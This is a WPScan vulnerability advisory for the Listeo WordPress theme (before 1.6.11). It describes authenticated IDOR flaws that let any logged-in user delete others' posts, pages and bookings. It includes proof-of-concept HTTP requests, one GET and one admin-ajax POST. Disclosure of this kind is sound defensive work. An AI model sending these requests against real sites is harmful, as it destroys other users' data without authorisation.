WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

Themes Vulnerabilities

Listeo < 1.6.11 - Multiple Authenticated IDOR Vulnerabilities

Description

The theme did not ensure that the Post/Page and Booking to delete belong to the user making the request, allowing any authenticated users to delete arbitrary page/post and booking via an IDOR vector.

Proof of Concept

### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ]

[!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100

[!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1
Host: listeo.pro
Cookie: [user cookies]



### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ]

[!] POST /wp-admin/admin-ajax.php HTTP/1.1
Host: listeo.pro
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Cookie: [user cookies]

action=listeo_bookings_manage&booking_id=13&status=deleted
 

Affects Themes

listeo
Fixed in version 1.6.11

References

CVE
CVE-2021-24318
URL
https://m0ze.ru/vulnerability/%5B2021-02-10%5D-%5BWordPress%5D-%5BCWE-639%5D-Listeo-WordPress-Theme-v1.6.10.txt

Classification

Type

IDOR

OWASP top 10
A5: Broken Access Control
CWE
CWE-284

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website
https://m0ze.ru
Submitter twitter
vladm0ze
Verified

No

WPVDB ID
9afa7e11-68b3-4196-975e-8b3f8e68ce56

Timeline

Publicly Published

2021-05-16 (about 1 years ago)

Added

2021-05-16 (about 1 years ago)

Last Updated

2021-05-18 (about 1 years ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceDisclosure policy
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us